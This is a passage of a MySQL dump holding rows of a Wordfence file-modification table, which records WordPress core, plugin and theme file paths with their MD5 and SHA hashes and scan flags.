(0x406f9bba6a58d25cadfc07fb9d42e4df, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wallet.svg', 0, 0x9ef633da91a569cb542ed2abcb760bda, 0x9ef633da91a569cb542ed2abcb760bda, 0x175daa0468e0e7a138aba3e5ede2d248abafdc41213d4304a2d92ad501824cf4, '', 0, '?'),
(0x407b73a395b2e3aa1f97726673500c24, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_duplicate_24px.svg', 0, 0x28aa56ec275cd516ed58e2993465f85a, 0x28aa56ec275cd516ed58e2993465f85a, 0x3b1b5e8a28a8f70c5d1de79f03057eb6f3980a89be356e804a343d46f32b4305, '', 0, '?'),
(0x40809ecc98398a23af4cc379280bd0da, 'wp-includes/images/arrow-pointer-blue.png', 1, 0x00000000000000000000000000000000, 0x779ffc62e3ce872a4cabb2c35bbb14f9, 0xddc2cae56662cf5a44312efcbafe56ece66177c6346c3fcef170e4b5475ec77b, '', 0, '?'),
(0x409621dfff4c8b1e49e1dafae89e63cc, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_map_24px.svg', 0, 0x8d04eb8aaff092d09146f0a2e3a1750e, 0x8d04eb8aaff092d09146f0a2e3a1750e, 0xf0a84d458a361d0caefa933c8996d4ca5f56d819cf226d80275e87c7c12e0517, '', 0, '?'),
(0x40b4c8bebb25b9dd5b9506614b929c7d, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-accordion.svg', 0, 0xe495ab4ffa710243a832cd3c3cfed196, 0xe495ab4ffa710243a832cd3c3cfed196, 0x30d0d1b926b3c92d7b2d3a28e391421cce8b682b1c462d2081e8e6557d3d5e5a, '', 0, '?'),
(0x40b9e01a217a919e72e5cad9579ec870, 'wp-content/plugins/wordfence/views/waf/option-rules.php', 1, 0x00000000000000000000000000000000, 0x207b0f3c1aefef18e8000d1aa024c0e0, 0x03c83466c59cc322221cc5823e324ce0af00221fcd6b8aea9431530a771c878f, '', 0, '?'),
(0x40ba58440ac30a524e867f9074ebcdd3, 'wp-admin/images/menu.png', 1, 0x00000000000000000000000000000000, 0xe10d8139230f1f8b64f35960098f8cff, 0xd96cfac849452f28bc70ad9600d2706ef38b96542d4fa51f7a225d2c3d6003ef, '', 0, '?'),
(0x40bfc8afeece12264ff16f9c011687ee, 'wp-content/plugins/wordfence/lib/noc1.key', 1, 0x00000000000000000000000000000000, 0x3965a46200e6c618504f0b8ac1be8594, 0x5fcb7591f6e16aebc7fd9082c603fa50fefe2d1c4b4f4183dcab9c12a6dbd6d3, '', 0, '?'),
(0x40c924a3f429ce28365395136329555e, 'wp-content/plugins/revslider/admin/assets/imports/classicslider/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x40cd7312f175849f4452db3eb353438d, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_toggle.php', 0, 0xd9e90ee4ca1aabcec2d1743466451634, 0xd9e90ee4ca1aabcec2d1743466451634, 0x7eb493f8f2e0670b7a7cd9f0361a40d0862821664a3fa25c6c658b2bc87e10db, '', 0, '?'),
(0x40cdc8d35ca73f249a4a9773427458a7, 'wp-content/themes/Impreza/framework/plugins-support/revslider.php', 0, 0xc54f983dfa3f210a165f8c7060bbc67d, 0xc54f983dfa3f210a165f8c7060bbc67d, 0xd830bc91e497f85b809b39908389777592f9c7a92b6401990b8df788e013a861, '', 0, '?'),
(0x40d84cbdd6dfaf37bbd9ad6bd9824519, 'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php', 1, 0x00000000000000000000000000000000, 0x6a6c462b99bc3e5402ad6d2f61767e33, 0x5a81d3df66f7a56b25a8eb79fb2cefd13fcd5343f8553dcee96c1168d195e61e, '', 0, '?'),
(0x40de3b358b5811f5f156a87f944fc65a, 'wp-admin/images/mask.png', 1, 0x00000000000000000000000000000000, 0xfcf693677ea822e6d24af7b2e4a98e99, 0xea9ed72f033c73c4d4a1e329dd27912eae31c09d016a6b6e834b390551eef4c9, '', 0, '?'),
(0x40e86dbeb7ebc54f0c1208c5dd571201, 'wp-admin/admin-header.php', 1, 0x00000000000000000000000000000000, 0xd8b55b4cfbc65e8299b3d4f5c74e93b6, 0x0687119a3d16bb9e9047ae937691659c68cd828fd968abcd04f2357974fbef1f, '', 0, '?'),
(0x40ea7419dc523e479c4868c4ed06d7a1, 'wp-admin/css/revisions-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xaa4b9f80af7993692411777d66e9d2de, 0x82d5d7874bfca1a9a4a2f3dedb3be63dfbb5ff29817a26c0b8edb9215f0f5b95, '', 0, '?'),
(0x40f773028d5af6945e99a5d3e8718d76, 'wp-admin/images/media-button-2x.png', 1, 0x00000000000000000000000000000000, 0x23db5749e51d85105cb8d03fc81305c9, 0x9f3cf3873abbf0746ebd6b621bed7769dd268cf109b8c8f752a11fb511d5ed1a, '', 0, '?'),
(0x40f8912be254ce8427b7b78fa518d9a4, 'wp-includes/ID3/module.audio.flac.php', 1, 0x00000000000000000000000000000000, 0x5892c3a5453e0825861d75b70758fe9f, 0x0416ae435f7a79c69ed276b85f0d5fc5f428f74e32b95163991bd4a2b22ad889, '', 0, '?'),
(0x40fbe189396276332d9704328603f4bc, 'wp-content/aiowps_backups/index.html', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x41003e5f2ad5e9b1e7cc258b05173285, 'wp-content/plugins/revslider/admin/assets/images/navigationeditor/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x410cad6c417e695e98829be975d3c398, 'wp-admin/css/customize-nav-menus.css', 1, 0x00000000000000000000000000000000, 0xe4832a345e012b47c028c8d9dfa2f3ad, 0x6f27e0fde699b1d3d67d117ab4b48a088cec0ffdd318fee7a8fed6fb0a07bbd6, '', 0, '?'),
(0x411945b6fb1ff4115b80608c11b78195, 'wp-includes/js/thickbox/thickbox.js', 1, 0x00000000000000000000000000000000, 0xd5d248a8730754587b4224c2d9ad36c7, 0x3b9640d2dbffb3fb84301b28a57b9b6f9f6915660e4bf5cfa4914551f7e29902, '', 0, '?'),
(0x411b7c910ed7e0ada2c9cd18b81bd5c4, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_30_24px.svg', 0, 0xe89a0798a3a9db1a87103991554a0acc, 0xe89a0798a3a9db1a87103991554a0acc, 0xc742a0951ecad0519869e81b41208811194b94eba46746617eb2c0ac6924cc33, '', 0, '?'),
(0x413b138d7fd8aa1abcbe96dca6ef7aab, 'wp-includes/sodium_compat/lib/constants.php', 1, 0x00000000000000000000000000000000, 0xc1bdbc16df7be2bb2385b26c05c53e6d, 0xace6d9b96d6328cd6cdae5fb2712d16d101474db12cba3955b94cc1867b9e857, '', 0, '?'),
(0x4145038daee73503760ae87b2907b17e, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.mo', 1, 0x00000000000000000000000000000000, 0x1419898a90e572daf855734d3d1587c8, 0x4932d08625f99561245a5647b78ef2537e3f2cca7516bbdbe70e55d17b73701d, '', 0, '?'),
(0x414b3caccbd26aa71c90179c677372e3, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', 1, 0x00000000000000000000000000000000, 0x1534ac954b62281de55cdef370b8422d, 0x03e79510d5b32a20cab0090fb6e40286145b717f8aa60ccb9c5088e682f46b81, '', 0, '?'),
(0x4161f7404aa7f703f3f1c2d7c581b71c, 'wp-includes/js/tinymce/plugins/colorpicker/plugin.js', 1, 0x00000000000000000000000000000000, 0x1f2043b8c3c8ad3f64847bd7ad568581, 0xb991b542a4ea52ac00a82197e4849a0b99faa7e195519a8caec4efadc0273577, '', 0, '?'),
(0x4173ba76fc03f7eef9826793341b55c3, 'wp-includes/js/dist/nux.min.js', 1, 0x00000000000000000000000000000000, 0x4e0704461feab9e3bea09c010240945d, 0x15e2785351ee1f35caa41ec156f585f6513ba30f1c4d1d4c939d3bb13add4c13, '', 0, '?'),
(0x417b26cf18208aa2563eec07b2ce9d73, 'wp-admin/css/login-rtl.css', 1, 0x00000000000000000000000000000000, 0xec4fea38c27fedb1f549773ee967311f, 0x0fad35ed04faa50c4797abc4ca04eab7f8bf6631d1ba172b47f124b79173a3fd, '', 0, '?'),
(0x418122168f037c063e75eb90da94bae0, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_description_24px.svg', 0, 0x64af96ce31366362de078dfe9aea795d, 0x64af96ce31366362de078dfe9aea795d, 0x179f0e33a0bcde84c1da9aede371420c01c94493fd6f4cf5b937f830ee50cc73, '', 0, '?'),
(0x41a1b693fce7cfb4aeb623ff5f6e8758, 'wp-content/plugins/js_composer/assets/js/dist/backend-actions.min.js', 0, 0xb24c944ade4fc8e6ed7cf29871711762, 0xb24c944ade4fc8e6ed7cf29871711762, 0x3fc1947db149101680ad0932a64e43ecae5221e4def52e95d923f8e513d2ad2b, '', 0, '?'),
(0x41a7478fef0e62c15ba6dcd65dab5e7f, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_off_24px.svg', 0, 0xb1c932a0c3e48eec324f04b0c1d05032, 0xb1c932a0c3e48eec324f04b0c1d05032, 0xde80399028db57583d1656516db30808ce09bda101dac885bee579641a365ed7, '', 0, '?'),
(0x41b395924efa9dca2563fad89af8530a, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_public_24px.svg', 0, 0xd9a9d3f543be43802a9fd154a6793bb6, 0xd9a9d3f543be43802a9fd154a6793bb6, 0x95a3e6d0709d9d525a4a852551290ee5f85ff2f9f938ac1ea7c46231d328a89d, '', 0, '?'),
(0x41bb3658ce0da4f15149ab0fa8823d27, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart02.svg', 0, 0x7dad5dd46b621ff73421e20977d32e7b, 0x7dad5dd46b621ff73421e20977d32e7b, 0x7f508e4a4cae22d586fede7c807085a62350a57150379cd81743a80163db2ce6, '', 0, '?'),
(0x41d8bb141523a81db2b922f3e0c56aad, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php', 1, 0x00000000000000000000000000000000, 0xaa1a5df60b008e162858e4c87af90bbe, 0x8e81e88c8ff71f502e29c467f7385d348a4235553b3e4a12e11066c39633127d, '', 0, '?'),
(0x42055ee6c7749b70846b808cf2ff21fa, 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php', 1, 0x00000000000000000000000000000000, 0x52d92a4cd35447e2e934255089b4b90f, 0x2d90968bd9d60fa96e9046904aad2654d350956f5ccf935c8eb9bfe63296eddf, '', 0, '?'),
(0x4221dd0b90b936f860a960a2c90965e2, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_24px.svg', 0, 0xb4804f0e73e754e34aa3d9aa0b67ff1d, 0xb4804f0e73e754e34aa3d9aa0b67ff1d, 0x2bdb1d19a5e58fe3db913df3f991fabfcf027144583364eb8b2c21d01c17d37f, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x424a92844fa29ee41faffc867a8f44b1, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php', 1, 0x00000000000000000000000000000000, 0xcdc87bf631ac4d07529c4b455fdffa2f, 0x7c719f555504d1bfc38e7c7ab98f473e2a93db9c2289e9e649019da2fedd3b83, '', 0, '?'),
(0x4255116a94765cd1a3e295e1e1e828ab, 'wp-content/plugins/wordfence/views/common/license.php', 1, 0x00000000000000000000000000000000, 0x795ea7403a46c267e3717f5d70ed214a, 0x8d8dcef586cbd08d5da90b7c135c0ecd8f5c7f4724aa795bc05c8ea54ae622df, '', 0, '?'),
(0x425f7dbb19a4602f60d912a80c4d7526, 'wp-content/themes/Impreza/page.php', 0, 0x9ae7ce0ae5843323502f66cc38205a87, 0x9ae7ce0ae5843323502f66cc38205a87, 0x7f77928e9d77fbcf28759ac577223a073f6aa8fcf89d326623ff5337ea43498c, '', 0, '?'),
(0x426377af83cfd411ab6c2862e1d7ef86, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/assets/js/bsf-core.js', 0, 0x59b7ad29276a1ce7c402fbe44e598f91, 0x59b7ad29276a1ce7c402fbe44e598f91, 0xd2f08402ddc2e15641f07fd224945f509f4faff06ef53c980f01a749a66a93ed, '', 0, '?'),
(0x4268b044f76a113789bf89cd8471a460, 'wp-content/plugins/js_composer/assets/css/lib/vc-entypo/fonts/vc_entypo.svg', 0, 0x6fd1b67024a29599ea0fcec785c21909, 0x6fd1b67024a29599ea0fcec785c21909, 0x461e359c699cf33fdfc9f2f06ddd254a6afb797b6d50b20aa59be609a14f6cb1, '', 0, '?'),
(0x426d753ee8346f40750f6526e0f2fcea, 'wp-content/themes/Impreza/framework/functions/post-types.php', 0, 0x987f587b48cde0de04a9df0471e5e2d3, 0x987f587b48cde0de04a9df0471e5e2d3, 0xf15e3a04d1a578a8251309e65c2f728c798ea3b287ec6b8afcb6a4cc1398e13e, '', 0, '?'),
(0x427d4b93af472ec2c99552ebc507afb0, 'wp-content/themes/Impreza/framework/templates/form/email.php', 0, 0x080b5d12b54b116d0879d79ccc533ca8, 0x080b5d12b54b116d0879d79ccc533ca8, 0x7212772c6c4fe6af926ebcf29bfb0195d5cc64036410169e7b17f090f93a46cd, '', 0, '?'),
(0x4283b16134a50031bb274444d67fd67a, 'wp-content/plugins/us-header-builder/config/meta-boxes.php', 0, 0xdb60ba4528bd43fc046c245472ffcaad, 0xdb60ba4528bd43fc046c245472ffcaad, 0xf72a7db6f226e6abf61cb0f4c9f6bae6be930129f86fd658fe7415d05b0f48db, '', 0, '?'),
(0x42861217a16a088429dfd071bc448a53, 'wp-admin/install-helper.php', 1, 0x00000000000000000000000000000000, 0xa20e27713a6514909125b411116cc9f1, 0xd7962994c124326796490d1980ec4c0bb4a6f948c486f5c816f321b1830abdf8, '', 0, '?'),
(0x429740853ec5fa604b61d085e219f316, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-text-block.svg', 0, 0x922e6d77f2b3ccb3bb468b6ed920d1d2, 0x922e6d77f2b3ccb3bb468b6ed920d1d2, 0x358f9ff800a02360a67d0d45f26b5fa2fc5b11ace2c2b8365334e4b46a7ec38d, '', 0, '?'),
(0x429a3d7ca6bfbf6128a4fe6a54439986, 'wp-content/plugins/revslider/includes/framework/cssparser.class.php', 0, 0xa10ee3cb1b6f9afe551880a02023cb45, 0xa10ee3cb1b6f9afe551880a02023cb45, 0x7368dfb95859984640444dd34153e54928df48680cd2970e5d5bbb917001506a, '', 0, '?'),
(0x429efb90f551c10ea208d36155ff1225, 'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php', 1, 0x00000000000000000000000000000000, 0xcd475e3db2708a3d24f719a71af1ae32, 0x0185524b900336878f811e16d7c44e22332a1c22bb4acf2f3069e9a2780530c4, '', 0, '?'),
(0x42ae7a32dbe939166cb02abb698e3124, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_money_off_24px.svg', 0, 0xc7d9ef622be69626cd56e90f8252921d, 0xc7d9ef622be69626cd56e90f8252921d, 0x88c5fa5d1942f78f5bea5679f7e5e11c33798a20872a8fd92dc4b675eb36a2a2, '', 0, '?'),
(0x42c006d639f015676cbcae06d00d9fb3, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x42d16a0461baa8ff36ddb70a60d89e35, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/info-box.js', 0, 0xfe783b31a9368beb7cd4e30f1822e57a, 0xfe783b31a9368beb7cd4e30f1822e57a, 0x56e2317bcb488b0fd464b9a161fb23ad7d8b18d2101ba43f18810d7325d03c01, '', 0, '?'),
(0x42db805c7b5e23e956ce172d9407eceb, 'wp-content/plugins/revslider/admin/views/templates/template-selector.php', 0, 0x5b0fc01e3f89cbb09f9da8cdf6df2a1f, 0x5b0fc01e3f89cbb09f9da8cdf6df2a1f, 0x4715cdbad1f742d48bf8cf36b23ede9c81b8e0f6209d8c1a35bfd425c21fcd60, '', 0, '?'),
(0x42e2ab44add460b791d06c16ec247f7f, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_railway_24px.svg', 0, 0x2ba3eb4806467c807a7ee60c5e2d309e, 0x2ba3eb4806467c807a7ee60c5e2d309e, 0xe600924b490ceb7a13109343c7e7e059eeab0d2e03d5ca44a84f1d20910e832b, '', 0, '?'),
(0x42e6ba501f891b58a157cce336e9cb17, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php', 1, 0x00000000000000000000000000000000, 0x20f5514111e44c9b92dcf39a9c86559e, 0x99dcd547b1a40a3c162e1a57870f72b4d8010e041ba301caaa10c7e3c398a229, '', 0, '?'),
(0x4318de2db068eed904c5f51ef6c5ffa1, 'wp-content/themes/Impreza/framework/templates/form/textfield.php', 0, 0xe5895c65799caabfc95273cdaa4b863c, 0xe5895c65799caabfc95273cdaa4b863c, 0x93851a78e2cc0368b6b7d246ca516c56032ab07df20e10ec8246315c235f2806, '', 0, '?'),
(0x432203227f2395c4371882e2fa6127da, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_android_24px.svg', 0, 0x21ae42cdb634256080771c8334deb58f, 0x21ae42cdb634256080771c8334deb58f, 0x42c8ec6a3ee4696aa380b0274ceff393bf8c47718c0d6b42ece837643ad711b7, '', 0, '?'),
(0x433fa1d41a773db0cc970cd74f2f6737, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_notifications_24px.svg', 0, 0x52ffe45d04bbde1ee591287791d9a76e, 0x52ffe45d04bbde1ee591287791d9a76e, 0x65b30b6f3ebb7910675ccae68b508d4bbf339419340e2b9d77ab6518a104a100, '', 0, '?'),
(0x43427d8a2655d181a1b98d6c281343fb, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant.svg', 0, 0x4bc86b8225388fd932d57cfa39d285f3, 0x4bc86b8225388fd932d57cfa39d285f3, 0x562f6899870bbab97c1eaa6c9a0d1f26c04fa6d93900f5e4722d5265dd641de6, '', 0, '?'),
(0x434dc8fa254b2e49841d573b28e4d93d, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_export_24px.svg', 0, 0xc67cadd3a29b0d04657a1464ee7c1435, 0xc67cadd3a29b0d04657a1464ee7c1435, 0x358485aa456149cff56ab30ac4dd5e5f5624a1de2563ddda752d9a85b758cba5, '', 0, '?'),
(0x434e3db9a5b5e682f997884181dcf85f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools.svg', 0, 0xc8187e8fe05f9cfed07af894fcd4b8e3, 0xc8187e8fe05f9cfed07af894fcd4b8e3, 0x2593db73732d1ace3b83dbcd02f407d582bdff58a6ae2ccc2697fb2fe15f218f, '', 0, '?'),
(0x4357d7576255a89e4b330fd991a383c7, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_spacer.php', 0, 0xffb0045842763fb73f8d8a4742a03d9e, 0xffb0045842763fb73f8d8a4742a03d9e, 0x503aa58c9392780af98d72378db0167b6de11b4a3273773d2393a2562b02df85, '', 0, '?'),
(0x4369351120f87d7513ffaa68ff813b1f, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-googleplus.php', 0, 0x510aeecea627147ec7ab601989f5a13e, 0x510aeecea627147ec7ab601989f5a13e, 0x32d52bea3f0838b6affc6996e7c1538a8fb1d892fd25bce574ce38e74a6969c3, '', 0, '?'),
(0x437f63e88869469bd768e80c2e6e3794, 'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php', 1, 0x00000000000000000000000000000000, 0x15c335258c3f3d40b6bc41969cf415ce, 0x207fa5455d10646beadfdddc609f063f947f66305b1e362a0012a71a199838d6, '', 0, '?'),
(0x4391bbd41d49fe16bb110ede5337ef3c, 'wp-content/plugins/wordfence/modules/login-security/views/page/page.php', 1, 0x00000000000000000000000000000000, 0x370085148a977e3bc84c07debea995b2, 0x9544a1547db333e1fd143dc554e9245ce65a7fbc0d88592f14b397c295a8fa45, '', 0, '?'),
(0x4399c2ba221590b0867546760369a46e, 'wp-content/themes/Impreza/framework/templates/single-us_portfolio.php', 0, 0x0caf6e82223533a3d5c85c5c72f372c1, 0x0caf6e82223533a3d5c85c5c72f372c1, 0x97ac2688df28d1d13ddbbf524780219a0af06360a8d1107a898f409458a83883, '', 0, '?'),
(0x439b1f0ea86747cc9530e6cb041f3973, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_new_24px.svg', 0, 0x593c69930f8cb2ef8414ed4359306c87, 0x593c69930f8cb2ef8414ed4359306c87, 0x8305457ae73e689165b784522821d4a90222448426ba7a13d974d233fc8f8559, '', 0, '?'),
(0x439ca7546b8180aa916d35c9f61aa711, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_explore_24px.svg', 0, 0xc5014df034118c050d6cbf6ca71ca69b, 0xc5014df034118c050d6cbf6ca71ca69b, 0xaade45cba3ab2f99caf84fdfe85395a73992685a915ccff6541ce1c764ef2768, '', 0, '?'),
(0x43adee9b2f8840b26cab8759c1fd327d, 'wp-includes/css/dist/format-library/style-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xcf8bddec90a1c79917947c459e8768ce, 0x8bb735040e8b63cb37c0ad0f4611a52dfaa7da4d5093854ff9e63b6dc2c4e26d, '', 0, '?'),
(0x43b2d89ad6141554bc52aa217616467b, 'wp-includes/customize/class-wp-customize-nav-menu-item-control.php', 1, 0x00000000000000000000000000000000, 0x2a98228f646f5199ebf89dae8fe0c3eb, 0xb8dc7df823da5b1e1323828903cf0786b4bbee7e27fbcaf65728e7329201f949, '', 0, '?'),
(0x43bf0e7cc6f2391c2f787da61d57a6ce, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bookmark.svg', 0, 0x97fcd85df3e328aff7d21300c9173992, 0x97fcd85df3e328aff7d21300c9173992, 0x6cce60f32df63512e58a61af0babb8403c4762a0c41e0a5ec22a22e13d85b371, '', 0, '?'),
(0x43c0d1e95415abc2a9e15d2a7ea13cea, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php', 0, 0x93d2c407a1183fa0535a8d0c7937649d, 0x93d2c407a1183fa0535a8d0c7937649d, 0x28b22b67f36afebf2cc79dd8716f62115a898918b72e091d79d4ea364be2f109, '', 0, '?'),
(0x43c26c94b72e21fe03e9115beaf48894, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/mb-YTPlayer.js', 0, 0x4c6a9b5291d41c8aad0de316d4712adb, 0x4c6a9b5291d41c8aad0de316d4712adb, 0x4b87a7f9189dea1fab7a6a9845bea8df4834ff7d4ccf5a7e093a23ab660336a7, '', 0, '?'),
(0x43d8b2ea6457ac5717bff3e796240877, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-structure.svg', 0, 0xf191e76e1e62d56955cb0ef3c24996ec, 0xf191e76e1e62d56955cb0ef3c24996ec, 0xd3367a3b2e4f14ea2096997c6fd8a0b72f13801251d291ca0ccd0f3b7f4768dc, '', 0, '?'),
(0x43e33d9e77e0e615be0d2a2a419cdd97, 'wp-content/themes/Impreza/framework/shortcodes/us_pricing.php', 0, 0xb534a9b73dbaeef2b9dfff1d6722a168, 0xb534a9b73dbaeef2b9dfff1d6722a168, 0x0ce82cc4a501c18d78240fd8e0b56a94835e04b3b7af528d781af0a8f693cab4, '', 0, '?'),
(0x43fad8735ca70af296e0da738ed5276d, 'wp-content/plugins/wordfence/lib/menu_tools_whois.php', 1, 0x00000000000000000000000000000000, 0xf8004a4d285d83eaf0a7b91a073777c2, 0x5b3a51dd9471c6462f71b006473b4e97404ba4857130381dc7cea44fca605bc8, '', 0, '?'),
(0x440c6db70abbbd7a974882c35394efef, 'wp-includes/images/crystal/document.png', 1, 0x00000000000000000000000000000000, 0x7f89275e639a73c0f9c4448bf933545c, 0x670ce674eabb2820c58e0ee7886b6035cd92a1fb4ab7cc074d35aec2c23a6ae4, '', 0, '?'),
(0x442ef7ee88f63a95000fbea553d45238, 'wp-includes/ID3/module.audio-video.asf.php', 1, 0x00000000000000000000000000000000, 0x0e4e7e0f1e4936afc2a6a18d0df6b86a, 0x9b3b927879e35c19dcff1cf68cf611f14cb9d8552165a882afdb54a13477087a, '', 0, '?'),
(0x4430fcad529da8280a8bdff5bbfaf8a4, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_off_24px.svg', 0, 0x67075e175667889d4b1cc18e2d24afcc, 0x67075e175667889d4b1cc18e2d24afcc, 0xb0627d55dbaba6dd3a9cb79a6fdc1d5af3a8b3b2e7748b5b7170e19f9c30234f, '', 0, '?'),
(0x44318030eca75e38545b2671a41af8d1, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.mo', 1, 0x00000000000000000000000000000000, 0x08e87f2b9e6f78dc662939c8d48e0e6f, 0x1ea0e42f0c3b08db4794c60aabce512d5da580f87d649f841320fe2063f3e9e8, '', 0, '?'),
(0x4436066dcb658e727b704be84f181092, 'wp-includes/locale.php', 1, 0x00000000000000000000000000000000, 0x87c6b20034a6296ff3157962551b5ea6, 0xc3183cd2366e8f27fa4a9ac1b3e5f45f0cc106d909190b8a5325d1e14707564a, '', 0, '?'),
(0x446da4a675e4cfa39321c249973548a4, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php', 1, 0x00000000000000000000000000000000, 0xba941470d9bdadb850aadb5d478190db, 0x8c7cb69f20298aa95915fb4df77ff4162c33f7bea53081e7ca1f1a2a8739ed70, '', 0, '?'),
(0x4485638d2764f7d15f8f96f1c89c5888, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-clip.svg', 0, 0x1f1a4df8ed5a48e6b4df284a6ac4dbe9, 0x1f1a4df8ed5a48e6b4df284a6ac4dbe9, 0xb37f4a535eefa4a86a9535f38a778916b7a83bc123172d2d1380e4b21f1e9710, '', 0, '?'),
(0x4490ccf6c9759a0dc5c28b88c9b2041a, 'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php', 1, 0x00000000000000000000000000000000, 0x0f9696345a3f64149795a51b8fe2a2a1, 0x31586152704c72494f2598257c1f0dced65667196500af2d62eb5e966ebd3db1, '', 0, '?'),
(0x4492c9f1bed5296261eb6bdac57bcbcb, 'wp-admin/includes/admin.php', 1, 0x00000000000000000000000000000000, 0x2676cd7b15874c7f6f324a6f42da8602, 0x60fca27f23a6f893360ca69977f26a0b2946e9086861ccc31828e0cd78ba1750, '', 0, '?'),
(0x44a39fbdbbf140286ac54acc0fa06fe8, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Modals.php', 0, 0xcf0547dd3004cd9e87ef3e21ff1e84f1, 0xcf0547dd3004cd9e87ef3e21ff1e84f1, 0x8bc3b248e76744b75f690248c749606f34a1d6b55872ababf60639df8cb5398c, '', 0, '?'),
(0x44afeec91e4e58414aae659f5473a470, 'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1579191227.css', 1, 0x00000000000000000000000000000000, 0x933c84bb770d6999ecbb8e764c2a78c9, 0xcd4ecd62b583900dcc8e8a2f3f1e2b27e5c4621c6927fa57e213244080691000, '', 0, '?'),
(0x44c905ba5d9800c1b0f3343aa77f6d9f, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate_bg.min.js', 0, 0x9cdbaaa2ef286dd768fccda0845c5ff8, 0x9cdbaaa2ef286dd768fccda0845c5ff8, 0x6f2579c6da9a0558571763e61fbf7ea69a79d56228166d53e8cd9d89ae9485f8, '', 0, '?'),
(0x44d5b9efdaf8bbe5d8244f61aaa3e9f4, 'wp-admin/css/colors/ectoplasm/colors-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xa4e0dd8fcafad10276caad5790a642fe, 0xf9569e7d2aa21983e332f5255e0bbb6293035c5721af903ece7b6dbf3f8b9ecd, '', 0, '?'),
(0x44e553a49e066b533603080f3a41f1b8, 'wp-content/themes/Impreza/forum.php', 0, 0x2c707031235e5231b042c364f119fc4f, 0x2c707031235e5231b042c364f119fc4f, 0x7cce8349f54db4aee584035461b777b38179ad0b713370a65e4d55c9dc6b02e3, '', 0, '?'),
(0x44ee545bc72dc2e1fd55e1f601f8f0b0, 'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php', 1, 0x00000000000000000000000000000000, 0xeb88a3f44509d3cb7862482497c27411, 0xdd1cd04684dfd96d30f8a9d0126a432c57f024fa9a1f89953d3986ff6eacd4ab, '', 0, '?'),
(0x44efb2d6350a27e55ca5c37e01579389, 'wp-includes/category.php', 1, 0x00000000000000000000000000000000, 0xb8b7e875e3193cb5ca0d80bc5cea4014, 0xfbe1741b7fe463fa5ae9e03fe18a30148d9883732b00e52da256cf7b85d3f273, '', 0, '?'),
